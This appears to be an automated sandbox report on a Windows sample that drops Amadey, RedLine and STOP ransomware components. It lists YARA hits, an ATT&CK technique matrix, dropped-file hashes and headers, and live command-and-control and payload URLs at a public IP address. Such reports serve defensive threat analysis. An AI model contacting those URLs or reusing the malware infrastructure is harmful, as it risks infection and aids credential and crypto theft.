Yara detected Amadeys stealer DLL

Source: Yara match	File source: 12.0.mnolyk.exe.980000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.mnolyk.exe.980000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xriv.exe.1360000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.0.mnolyk.exe.980000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.mnolyk.exe.980000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.file.exe.4a7e820.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.0.mnolyk.exe.980000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.mnolyk.exe.980000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.0.xriv.exe.1360000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.mnolyk.exe.980000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.mnolyk.exe.980000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.0.mnolyk.exe.980000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.file.exe.4a7e820.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.mnolyk.exe.980000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.0.mnolyk.exe.980000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.mnolyk.exe.980000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001C.00000000.478665181.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000000.315712522.0000000001361000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.774886747.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.332316282.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000000.735906035.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000000.329538528.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.736447784.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.607631806.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000000.607288773.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.352687909.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.479520127.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000000.352170413.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.318048617.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.250204509.0000000004A2A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe, type: DROPPED

Yara detected Amadey bot

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 0000000C.00000002.775069911.0000000000D1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.775069911.0000000000CBA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.775069911.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Yara detected Amadeys Clipper DLL

Source: Yara match	File source: 22.2.rundll32.exe.6d0c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\clip64[1].dll, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, type: DROPPED

Remote Access Functionality

Yara detected RedLine Stealer

Source: Yara match	File source: 2.2.afCf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.afCf.exe.6b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.afCf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.afCf.exe.660e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.287575754.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.262775984.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.287974900.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	3 Native API	1 Windows Service	2 Bypass User Access Control	21 Disable or Modify Tools	1 Input Capture	2 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	14 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	2 Command and Scripting Interpreter	1 Scheduled Task/Job	1 Access Token Manipulation	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	1 Input Capture	Exfiltration Over Bluetooth	2 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	1 Scheduled Task/Job	1 Registry Run Keys / Startup Folder	1 Windows Service	2 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	3 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	1 Service Execution	1 Services File Permissions Weakness	111 Process Injection	2 Software Packing	NTDS	36 System Information Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	113 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	1 Scheduled Task/Job	1 Timestomp	LSA Secrets	131 Security Software Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	1 Registry Run Keys / Startup Folder	2 Bypass User Access Control	Cached Domain Credentials	21 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	1 Services File Permissions Weakness	1 Masquerading	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	21 Virtualization/Sandbox Evasion	Proc Filesystem	1 System Owner/User Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	1 Access Token Manipulation	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	111 Process Injection	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	1 Services File Permissions Weakness	Input Capture	Permission Groups Discovery	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop
Compromise Software Supply Chain	Unix Shell	Launchd	Launchd	1 Rundll32	Keylogging	Local Groups	Component Object Model and Distributed COM	Screen Capture	Exfiltration over USB	DNS			Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	67%	ReversingLabs	Win32.Trojan.Amadey
file.exe	49%	Virustotal		Browse
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\clip64[1].dll	81%	ReversingLabs	Win32.Trojan.Amadey
C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	81%	ReversingLabs	Win32.Spyware.RedLine
C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe	54%	ReversingLabs	Win32.Trojan.Tedy
C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	81%	ReversingLabs	Win32.Spyware.RedLine
C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	47%	ReversingLabs	Win32.Ransomware.Stop
C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	82%	ReversingLabs	ByteCode-MSIL.Trojan.Disabler
C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll	81%	ReversingLabs	Win32.Trojan.Amadey

Source	Detection	Scanner	Label	Link
http://62.204.41.4/Gol478Ns/Plugins/cred64.dll	0%	Avira URL Cloud	safe
62.204.41.4/Gol478Ns/index.php	12%	Virustotal		Browse
http://62.204.41.4/Gol478Ns/Plugins/cred64.dll	2%	Virustotal		Browse
http://62.204.41.4/Gol478Ns/Plugins/clip64.dll	17%	Virustotal		Browse
http://62.204.41.4/Gol478Ns/Plugins/clip64.dll	100%	Avira URL Cloud	malware
http://62.204.41.4/Gol478Ns/index.php	100%	Avira URL Cloud	malware
62.204.41.4/Gol478Ns/index.php	100%	Avira URL Cloud	malware

Name	Malicious	Antivirus Detection	Reputation
http://62.204.41.4/Gol478Ns/Plugins/cred64.dll	true	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://62.204.41.4/Gol478Ns/Plugins/clip64.dll	true	17%, Virustotal, Browse Avira URL Cloud: malware	unknown
62.204.41.4/Gol478Ns/index.php	true	12%, Virustotal, Browse Avira URL Cloud: malware	low
http://62.204.41.4/Gol478Ns/index.php	true	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
62.204.41.4	unknown	United Kingdom		30798	TNNET-ASTNNetOyMainnetworkFI	true

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	800799
Start date and time:	2023-02-07 19:59:16 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 13m 50s
Hypervisor based Inspection enabled:	false
Report type:	light
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	32
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@38/14@0/1
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 46.9% (good quality ratio 44.9%) Quality average: 84.9% Quality standard deviation: 24.2%
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240s for rundll32

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe
HTTP Packets have been reduced
TCP Packets have been reduced to 100
Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
20:00:47	API Interceptor	2477x Sleep call for process: mnolyk.exe modified
20:00:50	Task Scheduler	Run new task: mnolyk.exe path: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Process:	C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	226
Entropy (8bit):	5.354940450065058
Encrypted:	false
SSDEEP:	6:Q3La/xw5DLIP12MUAvvR+uTL2wlAsDZiIv:Q3La/KDLI4MWuPTxAIv
MD5:	B10E37251C5B495643F331DB2EEC3394
SHA1:	25A5FFE4C2554C2B9A7C2794C9FE215998871193
SHA-256:	8A6B926C70F8DCFD915D68F167A1243B9DF7B9F642304F570CE584832D12102D
SHA-512:	296BC182515900934AA96E996FC48B565B7857801A07FEFA0D3D1E0C165981B266B084E344DB5B53041D1171F9C6708B4EE0D444906391C4FC073BCC23B92C37
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\afCf.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	321
Entropy (8bit):	5.355221377978991
Encrypted:	false
SSDEEP:	6:Q3La/xwchM3RJoDLIP12MUAvvR+uCqDLIP12MUAvvR+uTL2LDY3U21v:Q3La/hhkvoDLI4MWuCqDLI4MWuPk21v
MD5:	03C5BA5FCE7124B503EA65EF522177C3
SHA1:	F76B1F538D5EA66664355901E927B2F870ACCDD8
SHA-256:	8128CE419BBE0419F1A0BDE97C3A14E3377C0184DC1D7AF61AA01AAB756B625B
SHA-512:	151A974DDABA852144EC4BC18C548227A32E5261736F186A3920F2497434AEE9DBB0E0AB77E0E52A84A9FBC4529A158882B7549763400DDC2082D384B1135141
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\clip64[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	91136
Entropy (8bit):	6.3469756750979025
Encrypted:	false
SSDEEP:	1536:Fto4NPCKLbqoYkbpplW9YoUsxXzbcouNhj2ZszsWuKcdJU7dz5QIaB89p:roUCWbBNpplToUs1uNhj25LJUDaB89p
MD5:	C79B74D8FEC5E7E2BA2F1789FD582A15
SHA1:	78A1E5D99DBACCC5E07B125E1DFB280112CB3128
SHA-256:	B5BD049D32F0FAEEA6CE65A0F0D326DE5BC4427A7C1AD24BFB0EA050C1DEC7D3
SHA-512:	0DEBFC54904FD538CFB1FC648D18F90A991337200B3DECF74B28AC2F341843FB3BAB4F45BC92CFEC333B18DFFF9CC136854462E79054A39926A7BD8EE2E057BA
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey\'s Clipper DLL, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\clip64[1].dll, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 81%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........,Cy..Cy..Cy.....~Iy.....~.y.....~Qy.....~Ly.....~Ry.....~by.....~Fy..Cy...y.....~@y.....~By......By.....~By..RichCy..........PE..L....8.c...........!.................>....................................................@..........................J......<K..<...............................T... ?..p............................?..@...............,............................text...V........................... ..`.rdata...a.......b..................@..@.data...D....`.......D..............@....rsrc................P..............@..@.reloc..T............R..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	241664
Entropy (8bit):	6.368190069123744
Encrypted:	false
SSDEEP:	6144:YS/OgTLnk2FBtze+1T9uA/qruVyhVYjgVO:dO3v+uA+uVyhVvO
MD5:	8BB923C4D81284DAEF7896E5682DF6C6
SHA1:	67E34A96B77E44B666C5479F540995BDEACF5DE2
SHA-256:	9B0410052289A8416A458401FBB9A74D6361F4769465431B209F32151D7C6F21
SHA-512:	2DAED03277A343DB5FCB22E26BAEA5CDA41DE39DC825FE0AAD51F6EC181B8F38F09427F27FB58FFD179F37032600D107EF772CC6275F7D0D62899C6CD3F8AFF7
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 81%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.M...#...#...#.J. ...#.J.&..#.J.'...#..'...#.. ...#..&.:.#.J."...#..."..#....#.....#.!...#.Rich..#.........PE..L....8.c.............................y............@.......................................@.................................Hm..d................................(...?..p....................@......0@..@............................................text...}........................... ..`.rdata.............................@..@.data....D...........l..............@....rsrc...............................@..@.reloc...(.........................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	346112
Entropy (8bit):	7.640932751534781
Encrypted:	false
SSDEEP:	6144:K2y+bnr+Sp0yN90QEhNngiBIdDYf6EeYHPmSNjzAwtRS:KMriy90VRBIdhYzVtY
MD5:	DAE3685D13248C42313D46F76E2EC968
SHA1:	3547935A2D717DBFA69E9718F62A68ADDF58FFC8
SHA-256:	13A8DA35A2F966FAC5A6A327FA92A963EA287878E63C5416BA4F49BF80EE4D8B
SHA-512:	D77969AD3D60707C6870A0E14DC7DB9D7CB2624BBBC7448BF137E04B13232C28B1C796266CB8466D1F5C3FA720A006C884C13937E72C566A5074966E2AC0E566
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 54%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K..K..K...N..K...H..K...O..K...J..K..J...K...C..K.....K...I..K.Rich..K.........PE..L....`.b.................d..........`j............@.......................................@...... ......................................@...............................T...............................@............................................text....c.......d.................. ..`.data...H............h..............@....idata..R............j..............@..@.rsrc................\|..............@..@.reloc...............>..............@..B........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	241664
Entropy (8bit):	6.368190069123744
Encrypted:	false
SSDEEP:	6144:YS/OgTLnk2FBtze+1T9uA/qruVyhVYjgVO:dO3v+uA+uVyhVvO
MD5:	8BB923C4D81284DAEF7896E5682DF6C6
SHA1:	67E34A96B77E44B666C5479F540995BDEACF5DE2
SHA-256:	9B0410052289A8416A458401FBB9A74D6361F4769465431B209F32151D7C6F21
SHA-512:	2DAED03277A343DB5FCB22E26BAEA5CDA41DE39DC825FE0AAD51F6EC181B8F38F09427F27FB58FFD179F37032600D107EF772CC6275F7D0D62899C6CD3F8AFF7
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 81%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.M...#...#...#.J. ...#.J.&..#.J.'...#..'...#.. ...#..&.:.#.J."...#..."..#....#.....#.!...#.Rich..#.........PE..L....8.c.............................y............@.......................................@.................................Hm..d................................(...?..p....................@......0@..@............................................text...}........................... ..`.rdata.............................@..@.data....D...........l..............@....rsrc...............................@..@.reloc...(.........................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	251392
Entropy (8bit):	7.321238876486759
Encrypted:	false
SSDEEP:	3072:SJsOlmNl8dK08LQXi3Wh59aFBIaYLDgoA702gTutxYfTPJgWoVbXTbw3Ga44:SJs/ud/8Lf3jBITDYMStefrJgr9b64
MD5:	6E870598039CCE621C7BB265AC99BB3F
SHA1:	708EACDFEC2DED675D36C1EB3EA628797A366E10
SHA-256:	70C16C54B87BF8D2F57B36C26064E8E03D6F80CEB82254E556BE847A15CAEA95
SHA-512:	6200818C2CA60B10F14DAD31A55D4A89F51E0682F7459764608FD96E57663247F0DAACF8C773501077AD47D5BADD12E6829E5CFD65593366011BD1B4326117A4
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 47%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................B.s.....p.....f..............w...a.....q.....t....Rich...........PE..L....).a............................or............@.........................................................................l...P....p..............................@...............................p9..@............................................text............................... ..`.data...............................@....rsrc........p... ..................@..@.reloc...'.......(..................@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	11264
Entropy (8bit):	4.97029807367379
Encrypted:	false
SSDEEP:	96:yA/vMth9sDLibql3A44P9QL4fwmPImg+A03PvXLOzk+gqWYV4J6oP/zNt:yw+wGWt94+iANiCkc4Jhp
MD5:	7E93BACBBC33E6652E147E7FE07572A0
SHA1:	421A7167DA01C8DA4DC4D5234CA3DD84E319E762
SHA-256:	850CD190AAEEBCF1505674D97F51756F325E650320EAF76785D954223A9BEE38
SHA-512:	250169D7B6FCEBFF400BE89EDAE8340F14130CED70C340BA9DA9F225F62B52B35F6645BFB510962EFB866F988688CB42392561D3E6B72194BC89D310EA43AA91
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 82%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................"...0.."...........@... ...`....@.. ....................................@..................................@..O....`...............................@..8............................................ ............... ..H............text.... ... ...".................. ..`.rsrc........`.......$..............@..@.reloc.............................@..B.................@......H.......T$...............................................................0...........@s.....@...(....&..0..K......... ?...(......~....(....,.r...p.....(....%..(....& ....(....(....&.(....&..0..e.......(....~........+G.....o....r#..p(....,-.o.... ......(....-..(....&(.....o....(....&..X....i2..(....&....0..`.......(....~........+B.....o....r...p(....,(.o.... ......(....-..(....&.o....(....&..X....i2..(....&.0..c......... ?...(......~....(....,.*....(............%...(...

C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	91136
Entropy (8bit):	6.3469756750979025
Encrypted:	false
SSDEEP:	1536:Fto4NPCKLbqoYkbpplW9YoUsxXzbcouNhj2ZszsWuKcdJU7dz5QIaB89p:roUCWbBNpplToUs1uNhj25LJUDaB89p
MD5:	C79B74D8FEC5E7E2BA2F1789FD582A15
SHA1:	78A1E5D99DBACCC5E07B125E1DFB280112CB3128
SHA-256:	B5BD049D32F0FAEEA6CE65A0F0D326DE5BC4427A7C1AD24BFB0EA050C1DEC7D3
SHA-512:	0DEBFC54904FD538CFB1FC648D18F90A991337200B3DECF74B28AC2F341843FB3BAB4F45BC92CFEC333B18DFFF9CC136854462E79054A39926A7BD8EE2E057BA
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey\'s Clipper DLL, Source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 81%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........,Cy..Cy..Cy.....~Iy.....~.y.....~Qy.....~Ly.....~Ry.....~by.....~Fy..Cy...y.....~@y.....~By......By.....~By..RichCy..........PE..L....8.c...........!.................>....................................................@..........................J......<K..<...............................T... ?..p............................?..@...............,............................text...V........................... ..`.rdata...a.......b..................@..@.data...D....`.......D..............@....rsrc................P..............@..@.reloc..T............R..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	162
Entropy (8bit):	4.621829903792328
Encrypted:	false
SSDEEP:	3:qVoB3tURObOb0qHXboAcMBXqWrKb0GklIVLLPROZ/eIwcWWGu:q43tIkObRHXiMIWObtklI5LPROeIpfGu
MD5:	1B7C22A214949975556626D7217E9A39
SHA1:	D01C97E2944166ED23E47E4A62FF471AB8FA031F
SHA-256:	340C8464C2007CE3F80682E15DFAFA4180B641D53C14201B929906B7B0284D87
SHA-512:	BA64847CF1D4157D50ABE4F4A1E5C1996FE387C5808E2F758C7FB3213BFEFE1F3712D343F0C30A16819749840954654A70611D2250FD0F7B032429DB7AFD2CC5
Malicious:	false
Preview:	<html>..<head><title>404 Not Found</title></head>..<body>..<center><h1>404 Not Found</h1></center>..<hr><center>nginx/1.18.0 (Ubuntu)</center>..</body>..</html>..

\Device\ConDrv

Download File

Process:	C:\Windows\SysWOW64\cacls.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	15
Entropy (8bit):	3.240223928941852
Encrypted:	false
SSDEEP:	3:o3F:o1
MD5:	509B054634B6DE74F111C3E646BC80FD
SHA1:	99B4C0F39144A92FE42E22473A2A2552FB16BD13
SHA-256:	07C7C151ADD6D955F3C876359C0E2A3A3FB0C519DD1E574413F0B68B345D8C36
SHA-512:	A9C2D23947DBE09D5ECFBF6B3109F3CF8409E43176AE10C18083446EDE006E60E41C3EA2D2765036A967FC81B085D5F271686606AED4154AE45287D412CF6D40
Malicious:	false
Preview:	processed dir:

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.8099344672941
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	537088
MD5:	16755b75334b8655bc2357553a9fdab4
SHA1:	5705cf96e5337cd165fce107d5d11c020a69fe4f
SHA256:	e2b454a6a774a94abfde2acec235fde33da717943ab9e2c5c51b8428df0f9253
SHA512:	4dd98cecf0c988ca46aab7f9544ebc326653802e65014add232c7d926194eb07c7f7ace11e1ae85c36873845680df803cffb4878371e8ba185a44a81f588b348
SSDEEP:	6144:Kky+bnr+Pp0yN90QEDJ1o6Su5TojNCee1utRhD8r8yDdTIfDYt6EeYwPmSNVzAwE:0MrPy9066SuO/pyhTIb7Y4VtukFu
